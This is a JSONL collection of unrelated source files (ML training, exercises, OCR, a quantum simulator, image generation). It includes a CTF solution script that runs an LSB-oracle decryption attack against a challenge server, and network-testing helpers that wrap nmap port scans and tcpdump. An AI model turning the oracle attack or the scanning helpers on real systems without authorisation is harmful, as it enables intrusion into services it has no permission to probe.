urllib.request.urlopen(url)\n except urllib.error.HTTPError as e:\n # Return code error (e.g. 404, 501, ...)\n # ...\n print('HTTPError: {}'.format(e.code))\n except urllib.error.URLError as e:\n # Not an HTTP-specific error (e.g. connection refused)\n # ...\n print('URLError: {}'.format(e.reason))\n else:\n # 200\n # ...\n WordOfTheDay(conn)","sub_path":"DesktopNotification.py","file_name":"DesktopNotification.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"616826758","text":"# -*- coding: utf-8 -*cos-\r\n\"\"\"\r\nCreated on Sun Sep 23 23:38:03 2018\r\n\r\n@author: Invisible-Tilkey\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport matplotlib.pyplot as plt\r\nimport input_data\r\n#from tensorflow.examples.tutorials.mnist import input_data\r\n\r\nmnist = input_data.read_data_sets('data/', one_hot=True)\r\ntrainimg = mnist.train.images\r\ntrainlabel = mnist.train.labels\r\ntestimg = mnist.test.images\r\ntestlabel = mnist.test.labels\r\nprint (\"MNIST loaded\")\r\n\r\n# network topologies\r\n# input是像素点个数,classes是最后分类类别(10分类:0~9),hidden 每层神经元\r\nprint (\"What does the data of MNIST look like?\")\r\nn_input = 784\r\nn_output = 10\r\n\r\n# network parameters\r\n# w和b变量初始化\r\nstddev = 0.1\r\nweights = {\r\n # 卷积层权重\r\n 'wc1': tf.Variable(tf.random_normal([3, 3, 1, 64], stddev=stddev)),\r\n 'wc2': tf.Variable(tf.random_normal([3, 3, 64, 128], stddev=stddev)),\r\n # 全链接层权重,其中1024是我们定义的输出向量维数\r\n 'wd1': tf.Variable(tf.random_normal([7*7*128, 1024], stddev=stddev)),\r\n 'wd2': tf.Variable(tf.random_normal([1024, n_output], stddev=stddev)),\r\n} \r\n \r\n# 对w参数一般我们使用高斯初始化\r\nbiases = {\r\n 'bc1': tf.Variable(tf.random_normal([64], stddev=stddev)),\r\n 'bc2': tf.Variable(tf.random_normal([128], stddev=stddev)),\r\n 'bd1': tf.Variable(tf.random_normal([1024], stddev=stddev)),\r\n 'bd2': tf.Variable(tf.random_normal([n_output], stddev=stddev)),\r\n}\r\nprint (\"Network Ready\")\r\n# 对b参数用高斯和零值初始化都行\r\n\r\ndef conv_basic(_input, _w, _b, _keepratio):\r\n \r\n # INPUT 对输入做预处理,把输入格式转化(Reshape)为4维的,适应Tensorflow\r\n # 单张图片处理的情况下,令batch size = 1\r\n # dim1 = batch size = n // -1表示让Tensorflow自己推算,dim1是可以被自己推算的(另外三维确认情况下)\r\n # dim2 = height\r\n # dim3 = width\r\n # dim4 = channel\r\n _input_r = tf.reshape(_input, shape=[-1, 28, 28, 1])\r\n\r\n# =============================================================================\r\n# # CONV Layer1\r\n# =============================================================================\r\n # conv2d: 第一个输入是 reshape后输入\r\n # conv2d: 第二个输入是 权重参数wc1\r\n # conv2d: 第三个输入是 定义为四维格式,分别对应四个维度的stride/进步大小。一般只更改 h 和 w 的strides其他不变\r\n # conv2d: 第四个输入是 Padding 'SAME' of 'VALID' 卷积滑动窗口, \r\n # SAME 123 234 345 450 500 0填充 || 建议选择\r\n # VALID 123 234 345 不填充\r\n _conv1 = tf.nn.conv2d(_input_r, _w['wc1'], strides=[1, 1, 1, 1], padding='SAME')\r\n \r\n # 卷积完后,进行非线性激活函数 也就是ReLU\r\n _conv1 = tf.nn.relu(tf.nn.bias_add(_conv1, _b['bc1']))\r\n _pool1 = tf.nn.max_pool(_conv1, ksize = [1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\r\n # 可以随机杀死一些结点,不参与到总链接, Keepratio是保留参数比如 0.6\r\n _keepratio = 0.6\r\n _pool_dr1 = tf.nn.dropout(_pool1, _keepratio)\r\n\r\n\r\n# =============================================================================\r\n# # CONV Layer2\r\n# =============================================================================\r\n _conv2 = tf.nn.conv2d(_pool_dr1, _w['wc2'], strides=[1, 1, 1, 1], padding='SAME')\r\n _conv2 = tf.nn.relu(tf.nn.bias_add(_conv2, _b['bc2']))\r\n _pool2 = tf.nn.max_pool(_conv2, ksize = [1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\r\n _pool_dr2 = tf.nn.dropout(_pool2, _keepratio)\r\n\r\n # VECTORIZE 转换为向量\r\n # 获取wd1这个向量的形状7*7*128,再将其转换为list得到全链接层需要的向量大小\r\n _dense1 = tf.reshape(_pool_dr2, [-1, _w['wd1'].get_shape().as_list()[0]])\r\n # Fully connected layer 1 全链接层1\r\n _fc1 = tf.nn.relu(tf.add(tf.matmul(_dense1, _w['wd1']), _b['bd1']))\r\n _fc_dr1 = tf.nn.dropout(_fc1, _keepratio)\r\n # Fully connected layer 2 全链接层2\r\n _fc2 = tf.add(tf.matmul(_fc_dr1, _w['wd2']), _b['bd2'])\r\n \r\n # RETUEN\r\n out = { 'input_r': _input_r, 'conv1': _conv1, 'pool1': _pool1, 'pool_dr1': _pool_dr1,\r\n 'conv2': _conv2, 'pool2': _pool2, 'pool_dr2': _pool_dr2, 'dense1': _dense1,\r\n 'fc1': _fc1, 'fc_dr1': _fc_dr1, 'fc2': _fc2 \r\n }\r\n return out\r\nprint (\"CNN READY\")\r\n \r\n \r\n\r\n\r\n# =============================================================================\r\n# 迭代开始!!!!!!\r\n# =============================================================================\r\n\r\n#a = tf.Variable(tf.random_normal([3, 3, 1, 64], stddev=stddev))\r\n#print (a)\r\n#a = tf.Print(a, [a], \"a: \")\r\n\r\n# 先占用xy的位置,再一个个batch地往里面进行填充\r\nx = tf.placeholder(tf.float32, [None, n_input]) #None样本个数不确定, n_input=784\r\ny = tf.placeholder(tf.float32, [None, n_output]) #None样本个数不确定, n_class=10\r\nkeepratio = tf.placeholder(tf.float32)\r\n\r\n\r\n# 反向传播 Fonctions\r\n_pred = conv_basic(x, weights, biases, keepratio)['fc2']\r\n\r\n# Loss & Optimizer\r\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits = _pred, labels = y)) #交叉熵函数\r\noptm = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)\r\n_corr = tf.equal(tf.argmax(_pred, 1), tf.argmax(y, 1))\r\naccr = tf.reduce_mean(tf.cast(_corr, tf.float32))\r\ninit = tf.global_variables_initializer()\r\nprint (\"FONCTIONS READY\")\r\n\r\n# Train Parameter\r\ntraining_epochs = 15\r\n# batch size 较小,因为运算量太大\r\nbatch_size = 16\r\ndisplay_step = 1\r\n \r\nsess = tf.Session()\r\nsess.run(init)\r\n \r\n# OPTIMIZE\r\nfor epoch in range(training_epochs):\r\n avg_cost = 0.\r\n# total_batch = int(mnist.train.num_examples/batch_size) # batch次数=总数/batchsize\r\n total_batch = 10 # 运算量太大,不用全部算完\r\n #Iteration\r\n for i in range(total_batch):\r\n batch_xs, batch_ys = mnist.train.next_batch(batch_size)\r\n feeds = {x: batch_xs, y: batch_ys, keepratio: 0.7} # batch填充值\r\n sess.run(optm, feed_dict=feeds) \r\n avg_cost += sess.run(cost, feed_dict=feeds)\r\n \r\n if epoch % display_step == 0:\r\n print (\"Epoch: %03d/%03d cost:%.9f\" % (epoch, training_epochs, avg_cost))\r\n train_acc = sess.run(accr, feed_dict={x: batch_xs, y: batch_ys})\r\n print (\"TRAIN ACCURACY: %.3f\" % (train_acc))\r\n# test_acc = sess.run(accr, feed_dict=feeds)\r\n# print (\"TEST ACCURACY: %.3f\" % (test_acc))\r\nprint (\"OPTIMIZATION FINISHED\")\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ","sub_path":"some_my_not_yet_ordered_practicing/C N Network.py","file_name":"C N Network.py","file_ext":"py","file_size_in_byte":6807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"406638476","text":"\nfrom termcolor import colored\n\n\nprint(colored(\"\"\"\n++++++++++++++++++++++++++++++++++++\n+ + \n+ Task from the book +\n+ \"Pytnon Crash course\" +\n+ +\n+ Section #6 +\n+ Task#6-5 +\n+ Task name rivers +\n+ + \n+ +\n++++++++++++++++++++++++++++++++++++ \n\"\"\", 'yellow'))\n\n#6-5. Реки: создайте словарь с тремя большими реками и странами, по которым протекает\n#каждая река. Одна из возможных пар «ключ—значение» — ‘nile’: ‘egypt’.\n#• Используйте цикл для вывода сообщения с упоминанием реки и страны — например,\n#«The Nile runs through Egypt.»\n#• Используйте цикл для вывода названия каждой реки, включенной в словарь.\n#• Используйте цикл для вывода названия каждой страны, включенной в словарь.\n# Ну и от себя добавлю красоты цветом\nrivers = {\n'egypt' : 'neal',\n'russia' : 'volga',\n'usa' : 'gudzon'\n }\n\nfor name, river in rivers.items(): # НАПОМИНАНИЕ если ходим ВСЕ данные то используем \"items()\"\n print(\"The \" + colored(river, 'green') +\" runs through \" + colored(name, 'yellow'))\n\n\nprint (colored(\"+++++++++++++++\", 'red'))\nfor name in rivers.keys():\n print(name)\nprint (colored(\"+++++++++++++++\", 'red'))\nprint (colored(\"+++++++++++++++\", 'blue'))\nfor river in rivers.values():\n print(river)\nprint (colored(\"+++++++++++++++\", 'blue'))\n\n\n\n\nprint(\"EOF PAK\")\ninput()\n\n\n","sub_path":"rivers6-5.py","file_name":"rivers6-5.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"366477075","text":"#!/usr/bin/env python\n\nfrom sys import stdin, stdout, stderr\nfrom itertools import product\nfrom re import search\nfrom string import digits, letters\nfrom hashlib import sha1\n\ndef proof_of_work():\n # Before we begin, a quick proof of work:\\n\n stderr.write(stdin.readline())\n # Give me a string starting with {}, of length {}, such that its sha1 sum ends in ffffff\\n\n line = stdin.readline()\n stderr.write(line)\n stderr.flush()\n m = search(r'with (\\w+), of length (\\d+)', line)\n assert m is not None\n prefix = m.group(1)\n length = long(m.group(2))\n for t in product(digits + letters, repeat=length-len(prefix)):\n s = prefix + \"\".join(t)\n if sha1(s).digest()[-3:] == \"\\xff\"*3:\n stderr.write(\"{}\\n\".format(s))\n stderr.flush()\n stdout.write(s)\n stdout.flush()\n return\n\ndef guess():\n # Welcome to the LSB oracle! N = {}\\n\n line = stdin.readline()\n stderr.write(line)\n m = search(r'N = (\\d+)', line)\n assert m is not None\n N = long(m.group(1))\n # Encrypted Flag: {}\\n\n line = stdin.readline()\n stderr.write(line)\n stderr.flush()\n m = search(r'Encrypted Flag: (\\d+)', line)\n assert m is not None\n enc_flag = long(m.group(1))\n # Give a ciphertext:\n lower = 0\n upper = N\n c = enc_flag\n i = 0\n while lower < upper:\n c = (4 * c) % N\n stdout.write(\"{}\\n\".format(c))\n stdout.flush()\n # lsb is {}\\n\n m = search(r'lsb is (\\d+)', stdin.readline())\n assert m is not None\n lsb = int(m.group(1))\n if lsb == 1:\n lower = (lower + upper) // 2\n else:\n upper = (lower + upper) // 2\n stderr.write(\"#{} lsb={} remaining={} {}<=x<{}\\n\".\n format(i, lsb, (upper-lower).bit_length(), lower, upper))\n stderr.flush()\n i += 1\n stderr.write(\"flag is {}\\n\".format(format(upper, 'x').decode('hex')))\n stderr.flush()\n\nproof_of_work()\nguess()\n","sub_path":"2016/plaidctf-2016/rabit-175/rabit.py","file_name":"rabit.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"83376791","text":"# Copyright (c) 2015\n#\n# All rights reserved.\n#\n# This file is distributed under the Clear BSD license.\n# The full text can be found in LICENSE in the root directory.\n# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4\n\nimport re\n\ndef tcpdump_capture(device, interface, port=None, capture_file='pkt_capture.pcap'):\n if port == None:\n device.sudo_sendline(\"tcpdump -i %s -n -w %s &\" %(interface, capture_file))\n else:\n device.sudo_sendline(\"tcpdump -i %s -n \\'portrange %s\\' -w %s &\" %(interface, port, capture_file))\n device.expect(device.prompt)\n return device.before\n\ndef kill_process(device, process=\"tcpdump\"):\n device.sudo_sendline(\"killall %s\" %process)\n device.expect(device.prompt)\n device.sudo_sendline(\"sync\")\n device.expect(device.prompt)\n return device.before\n\ndef tcpdump_read(device, capture_file):\n device.sudo_sendline(\"tcpdump -n -r %s\" %(capture_file))\n device.expect(device.prompt)\n output = device.before\n device.sudo_sendline(\"rm %s\" %(capture_file))\n device.expect(device.prompt)\n return output\n\ndef nmap_cli(device, ip_address, port, protocol=None, retry=\"0\"):\n if protocol == \"tcp\":\n device.sudo_sendline(\"nmap -sS %s -p %s -Pn -r -max-retries %s\" %(ip_address,port,retry))\n elif protocol == \"udp\":\n device.sudo_sendline(\"nmap -sU %s -p %s -Pn -r -max-retries %s\" %(ip_address,port,retry))\n else:\n device.sudo_sendline(\"nmap -sS -sU %s -p %s -Pn -r -max-retries %s\" %(ip_address,port,retry))\n device.expect(device.prompt,timeout=200)\n return device.before\n\ndef ssh_service_verify(device, dest_device, ip, opts=\"\", ssh_key=\"-oKexAlgorithms=+diffie-hellman-group1-sha1\"):\n \"\"\"\n This function assumes that the server does not know the identity of the client!!!!!\n I.e. no passwordless login\n \"\"\"\n device.sendline(\"ssh %s@%s\" %(dest_device.username, ip))\n try:\n idx = device.expect(['no matching key exchange method found']+ ['(yes/no)']+ ['assword:'], timeout=60)\n if idx == 0:\n device.expect(device.prompt)\n device.sendline(\"ssh %s %s@%s %s\" %(ssh_key, dest_device.username, ip, opts))\n idx = device.expect(['(yes/no)'] + ['assword:'], timeout=60)\n if idx == 0:\n idx = 1\n if idx == 1:\n device.sendline('yes')\n device.expect(\"assword:\")\n device.sendline(dest_device.password)\n device.expect(dest_device.prompt)\n device.sendline(\"exit\")\n device.expect(device.prompt, timeout=20)\n except Exception as e:\n print(e)\n raise Exception(\"Failed to connect SSH to :%s\" %device.before)\n\ndef telnet_service_verify(device, dest_device, ip, opts=\"\"):\n device.sendline(\"telnet%s %s\" %(opts, ip))\n try:\n device.expect([\"Username:\"], timeout=60)\n device.sendline(dest_device.username)\n device.expect([\"assword:\"])\n device.sendline(dest_device.password)\n device.expect(dest_device.prompt, timeout=40)\n device.sendline(\"exit\")\n device.expect(device.prompt, timeout=20)\n except Exception as e:\n print(e)\n raise Exception(\"Failed to connect telnet to :%s\" %device.before)\n","sub_path":"boardfarm/tests/lib/network_testing.py","file_name":"network_testing.py","file_ext":"py","file_size_in_byte":3207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"128051373","text":"\"\"\"\n53. Tokenization\nStanford Core NLPを用い,入力テキストの解析結果をXML形式で得よ.\nまた,このXMLファイルを読み込み,入力テキストを1行1単語の形式で出力せよ.\n\njava -cp \"/usr/local/lib/stanford-corenlp-full-2013-06-20/*\"\n -Xmx2g edu.stanford.nlp.pipeline.StanfordCoreNLP\n -annotators tokenize,ssplit,pos,lemma,ner,parse,dcoref -file nlp.txt\n\"\"\"\n# coding: utf-8\n#from collections import defaultdict\nimport re\n\n\nwith open('nlp.txt.xml', 'r') as fxml:\n for line in fxml:\n m = re.search(r'(.*?)',line)\n if m:\n print(m.group(1))\n\n\n\n\n'''\nimport xml.etree.ElementTree as ET\n\nxml_root=ET.parse('nlp.txt.xml')\n\nfor word in xml_root.iter('word'):\n\n print(word.text)\n\n'''\n","sub_path":"kohei4/chapter06/knock53.py","file_name":"knock53.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"414013135","text":"#!/Users/chrisst/.virtualenvs/redditmade/bin/python\n\nfrom PIL import Image, ImageFont, ImageDraw \n\n\ndef add_corners(im, rad):\n circle = Image.new('L', (rad * 2, rad * 2), 0)\n draw = ImageDraw.Draw(circle)\n draw.ellipse((0, 0, rad * 2, rad * 2), fill=255)\n alpha = Image.new('L', im.size, 255)\n w, h = im.size\n alpha.paste(circle.crop((0, 0, rad, rad)), (0, 0))\n alpha.paste(circle.crop((0, rad, rad, rad * 2)), (0, h - rad))\n alpha.paste(circle.crop((rad, 0, rad * 2, rad)), (w - rad, 0))\n alpha.paste(circle.crop((rad, rad, rad * 2, rad * 2)), (w - rad, h - rad))\n im.putalpha(alpha)\n im.show()\n return im\n\nfont_location = \"/Library/Fonts/OpenSans-Bold.ttf\"\n\n\n# print img.getpixel((progressXOffset, progressYOffset))\n# img2 = Image.new('RGBA', (350,50), color=img.getpixel((progressXOffset, progressYOffset)))\n#img2.show()\n\ndef build_3x1_ad(image_name=None, shirt_image=None):\n background = Image.open(\"image_templates/ad_small.png\")\n draw = ImageDraw.Draw(background)\n\n mask = Image.open('image_templates/shirt_mask.png')\n shirt = Image.open(shirt_image)\n shirt.thumbnail((250,250), Image.ANTIALIAS)\n mask.thumbnail((250,250), Image.ANTIALIAS)\n\n background.paste(shirt, mask=mask, box=(123,-29))\n\n image_path = 'compiled_templates/' + image_name\n background.save(image_path)\n # background.show()\n\n return image_path\n\ndef build_rectangle_ad(image_name=None, subreddit=None, shirt_image=None):\n background = Image.open(\"image_templates/med_rect.png\").convert('RGB')\n draw = ImageDraw.Draw(background, 'RGBA')\n image_path = 'compiled_templates/' + image_name \n\n #Image mask must be the correct mode! ie: '1' or 'L'\n mask = Image.open('image_templates/shirt_mask.png')\n shirt = Image.open(shirt_image)\n #resize with thumbnail\n shirt.thumbnail((350,250), Image.ANTIALIAS)\n mask.thumbnail((350,250), Image.ANTIALIAS)\n\n shirt_offset_x = (background.size[0]-shirt.size[0]) / 2\n background.paste(shirt, mask=mask, box=(shirt_offset_x,28))\n \n font = ImageFont.truetype(font_location, 14)\n text_offset_x = (background.size[0]-font.getsize('/r/'+subreddit)[0]) / 2\n draw.text((text_offset_x, 38), '/r/'+subreddit, (0,0,0), font=font)\n\n #Add a white transparent bar\n draw.rectangle([(0,200), (300,250)], fill=(255, 255, 255, 150))\n \n # background.show()\n background.save(image_path)\n\n return image_path\n\ndef update_progress(image_name=None, text_offset=(0,0), text=\"\", bar_offset=(0,0), bar_size=(0,0), percent=0, goal=0):\n img = Image.open('compiled_templates/' + image_name)\n write_progress_text(img, text_offset, text)\n draw_progess_bar(img, bar_offset, bar_size, percent)\n\n img.save('final_images/' + image_name)\n return 'final_images/' + image_name\n\ndef write_progress_text(image, offset, text):\n draw = ImageDraw.Draw(image)\n font = ImageFont.truetype(font_location, 12)\n draw.text(offset, text, (0,0,0), font=font)\n\n return image\n\ndef draw_progess_bar(image, offset, size, percent):\n #TODO if image is missing, make it.\n \n draw = ImageDraw.Draw(image)\n\n draw.rectangle([(offset[0]-1, offset[1]-1), ((offset[0]+size[0])+1, offset[1]+size[1]+1)],\n fill='white', outline=(177,177,177))\n draw.rectangle([(offset[0], offset[1]), (offset[0]+(size[0]*percent), \n offset[1]+size[1])], fill=(176,222,88))\n\n image.show()\n return image\n\n#img = add_corners(img, 10)\n\n\n","sub_path":"image_builder/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"427678981","text":"__author__ = 'Thomas'\n\nfrom flask import Flask, render_template, redirect, url_for, request, session, flash\nfrom functools import wraps\napp = Flask(__name__)\n\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef index():\n if request.method == \"POST\":\n tableList = request.form['tables']\n print(tableList);\n# return redirect(url_for('.products', tables=tableList))\n return render_template(\"index.html\")\n\n@app.route(\"/products\", methods=['GET', 'POST'])\ndef products():\n return render_template(\"products.html\");\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"Flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"389196039","text":"import numpy as np\r\nimport os\r\nimport cv2\r\nimport glob\r\nimport shutil\r\nimport pytesseract\r\nimport re\r\nimport time\r\nimport argparse\r\nfrom statistics import mode\r\nfrom pdf2image import convert_from_path\r\n\r\noutput_dir = \"D:\\\\test\"\r\n\r\ndef apply_threshold(img, argument):\r\n switcher = {\r\n 1: cv2.threshold(cv2.GaussianBlur(img, (9, 9), 0), 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)[1],\r\n 2: cv2.threshold(cv2.GaussianBlur(img, (7, 7), 0), 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)[1],\r\n 3: cv2.threshold(cv2.GaussianBlur(img, (5, 5), 0), 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)[1],\r\n 4: cv2.threshold(cv2.medianBlur(img, 5), 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)[1],\r\n 5: cv2.threshold(cv2.medianBlur(img, 3), 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)[1],\r\n 6: cv2.adaptiveThreshold(cv2.GaussianBlur(img, (5, 5), 0), 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 31, 2),\r\n 7: cv2.adaptiveThreshold(cv2.medianBlur(img, 3), 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 31, 2),\r\n }\r\n return switcher.get(argument, \"Invalid method\")\r\n\r\ndef get_string(img_path, method):\r\n # Read image using opencv\r\n img = cv2.imread(img_path)\r\n\r\n # Extract the file name without the file extension\r\n file_name = os.path.basename(img_path).split('.')[0]\r\n file_name = file_name.split()[0]\r\n if 'pdf' in img_path:\r\n \tpages = convert_from_path(img_path, 500)\r\n \tpage = pages[0]\r\n \tpage.save('test.png', 'PNG')\r\n \timg = cv2.imread('test.png')\r\n\r\n # Create a directory for outputs\r\n output_path = os.path.join(output_dir, file_name)\r\n if not os.path.exists(output_path):\r\n os.makedirs(output_path)\r\n # Rescale the image, if needed.\r\n img = cv2.resize(img, None, fx=1.5, fy=1.5, interpolation=cv2.INTER_CUBIC)\r\n # Convert to gray\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n\r\n # Apply dilation and erosion to remove some noise\r\n #kernel = np.ones((1, 1), np.uint8)\r\n #img = cv2.dilate(img, kernel, iterations=1)\r\n #img = cv2.erode(img, kernel, iterations=1)\r\n\r\n # Apply blur to smooth out the edges\r\n #img = cv2.GaussianBlur(img, (5, 5), 0)\r\n\r\n # Apply threshold to get image with only b&w (binarization)\r\n img = cv2.threshold(img, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)[1]\r\n\r\n # used for applying histogram equalizaion\r\n if method == 8:\r\n #clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8,8))\r\n #img = clahe.apply(img)\r\n img = cv2.equalizeHist(img)\r\n method = 6\r\n \r\n img = apply_threshold(img, method)\r\n # Save the filtered image in the output directory\r\n save_path = os.path.join(output_path, file_name + \"_filter_\" + str(method) + \".jpg\")\r\n cv2.imwrite(save_path, img)\r\n\r\n # Recognize text with tesseract for python\r\n result = pytesseract.image_to_string(img, lang=\"eng\")\r\n return result\r\n\r\nif __name__ == \"__main__\":\r\n\t#img_path = 'C:\\\\Pune_Hyderabad.ETicket-1.png'\r\n\t#img_path = 'C:\\\\Pune_Hyderabad.ETicket.pdf'\r\n\timg_path = 'C:\\\\images\\\\boarding_pass.jpg'\r\n\tfinal = get_string(img_path, 8)\r\n\ttext_file = open(\"D:\\\\test\\\\Output.txt\", \"w\")\r\n\ttext_file.write(final)\r\n\ttext_file.close() \r\n\tprint(\"Successful\")\r\n","sub_path":"codegrind2.0/tess_test.py","file_name":"tess_test.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"402013955","text":"# Copyright 2010 Google Inc.\n# Licensed under the Apache License, Version 2.0\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Google's Python Class\n# http://code.google.com/edu/languages/google-python-class/\n\n\"\"\" Wordcount exercise\nGoogle's Python class\n\nThe main() below is already defined and complete. It calls print_words()\nand print_top() functions which you write.\n\n1. For the --count flag, implement a print_words(filename) function that counts\nhow often each word appears in the text and prints:\nword1 count1\nword2 count2\n...\n\nPrint the above list in order sorted by word (python will sort punctuation to\ncome before letters -- that's fine). Store all the words as lowercase,\nso 'The' and 'the' count as the same word.\n\n2. For the --topcount flag, implement a print_top(filename) which is similar\nto print_words() but which prints just the top 20 most common words sorted\nso the most common word is first, then the next most common, and so on.\n\nUse str.split() (no arguments) to split on all whitespace.\n\nWorkflow: don't build the whole program at once. Get it to an intermediate\nmilestone and print your data structure and sys.exit(0).\nWhen that's working, try for the next milestone.\n\nOptional: define a helper function to avoid code duplication inside\nprint_words() and print_top(). \"\"\"\n\nfrom collections import Counter\nfrom sys import argv, exit\n\n\ndef count_words(filename):\n with open(filename, 'r') as f:\n return Counter(a.lower() for a in f.read().split())\n\n\ndef print_words(filename):\n [print('{:<37} {:>10}'.format(word, cnt))\n for word, cnt in sorted(count_words(filename).items())]\n\n\ndef print_top(filename):\n [print('{:<6} {:>10}'.format(word, cnt))\n for word, cnt in count_words(filename).most_common(20)]\n\n\ndef main():\n if len(argv) != 3:\n print('usage: ./wordcount.py {--count | --topcount} file')\n exit(1)\n\n option = argv[1]\n filename = argv[2]\n if option == '--count':\n print_words(filename)\n exit(0)\n elif option == '--topcount':\n print_top(filename)\n exit(0)\n else:\n print('unknown option: ' + option)\n exit(1)\n\nif __name__ == '__main__':\n main()\n","sub_path":"basic/wordcount.py","file_name":"wordcount.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"160397855","text":"# -*- coding: utf-8 -*-\n\n# Copyright 2017, IBM.\n#\n# This source code is licensed under the Apache License, Version 2.0 found in\n# the LICENSE.txt file in the root directory of this source tree.\n\n# pylint: disable=invalid-name\n\n\"\"\"Contains a (slow) python statevector simulator.\n\nIt simulates the statevector through a quantum circuit. It is exponential in\nthe number of qubits.\n\nWe advise using the c++ simulator or online simulator for larger size systems.\n\nThe input is a qobj dictionary and the output is a Result object.\n\nThe input qobj to this simulator has no shots, no measures, no reset, no noise.\n\"\"\"\nimport logging\n\nfrom qiskit.backends.local.localjob import LocalJob\nfrom qiskit.backends.local._simulatorerror import SimulatorError\nfrom qiskit.qobj import QobjInstruction\nfrom .qasm_simulator_py import QasmSimulatorPy\n\nlogger = logging.getLogger(__name__)\n\n\nclass StatevectorSimulatorPy(QasmSimulatorPy):\n \"\"\"Python statevector simulator.\"\"\"\n\n DEFAULT_CONFIGURATION = {\n 'name': 'local_statevector_simulator_py',\n 'url': 'https://github.com/QISKit/qiskit-terra',\n 'simulator': True,\n 'local': True,\n 'description': 'A Python statevector simulator for qobj files',\n 'coupling_map': 'all-to-all',\n 'basis_gates': 'u1,u2,u3,cx,id,snapshot'\n }\n\n def __init__(self, configuration=None):\n super().__init__(configuration or self.DEFAULT_CONFIGURATION.copy())\n\n def run(self, qobj):\n \"\"\"Run qobj asynchronously.\n\n Args:\n qobj (dict): job description\n\n Returns:\n LocalJob: derived from BaseJob\n \"\"\"\n local_job = LocalJob(self._run_job, qobj)\n local_job.submit()\n return local_job\n\n def _run_job(self, qobj):\n \"\"\"Run a Qobj on the backend.\"\"\"\n self._validate(qobj)\n final_state_key = 32767 # Internal key for final state snapshot\n # Add final snapshots to circuits\n for experiment in qobj.experiments:\n experiment.instructions.append(\n QobjInstruction(name='snapshot', params=[final_state_key])\n )\n result = super()._run_job(qobj)\n # Replace backend name with current backend\n result.backend_name = self.name\n # Extract final state snapshot and move to 'statevector' data field\n for experiment_result in result.results.values():\n snapshots = experiment_result.snapshots\n if str(final_state_key) in snapshots:\n final_state_key = str(final_state_key)\n # Pop off final snapshot added above\n final_state = snapshots.pop(final_state_key, None)\n final_state = final_state['statevector'][0]\n # Add final state to results data\n experiment_result.data['statevector'] = final_state\n # Remove snapshot dict if empty\n if snapshots == {}:\n experiment_result.data.pop('snapshots', None)\n return result\n\n def _validate(self, qobj):\n \"\"\"Semantic validations of the qobj which cannot be done via schemas.\n Some of these may later move to backend schemas.\n\n 1. No shots\n 2. No measurements in the middle\n \"\"\"\n if qobj.config.shots != 1:\n logger.info(\"statevector simulator only supports 1 shot. \"\n \"Setting shots=1.\")\n qobj.config.shots = 1\n for experiment in qobj.experiments:\n if getattr(experiment.config, 'shots', 1) != 1:\n logger.info(\"statevector simulator only supports 1 shot. \"\n \"Setting shots=1 for circuit %s.\", experiment.name)\n experiment.config.shots = 1\n for op in experiment.instructions:\n if op.name in ['measure', 'reset']:\n raise SimulatorError(\n \"In circuit {}: statevector simulator does not support \"\n \"measure or reset.\".format(experiment.header.name))\n","sub_path":"qiskit/backends/local/statevector_simulator_py.py","file_name":"statevector_simulator_py.py","file_ext":"py","file_size_in_byte":4005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"123893945","text":"#!/usr/bin/env python\n\nimport logging\nimport threading\nfrom queue import Queue\n\nclass Task(object):\n def __init__(self, taskid, func, *args):\n self.logger = logging.getLogger('task_executor')\n self.func = func\n self.args = args\n self.taskid = taskid\n\n def execute(self, local_data):\n args = ()\n args += (local_data, )\n args += self.args\n try:\n self.func(*args)\n except Exception as e:\n self.logger.exception(e)\n\n\nclass TaskExecutor(object):\n def __init__(self, idx):\n self.local_data = dict()\n self.queue = Queue()\n self.empty = threading.Event()\n self.empty.set()\n self.running = True\n self.thread = threading.Thread(target=self.loop, args=())\n self.thread.name = 'worker-{}'.format(idx)\n self.thread.start()\n\n def submit(self, task):\n self.empty.clear()\n self.queue.put(task)\n\n def loop(self):\n while self.running:\n task = self.queue.get()\n 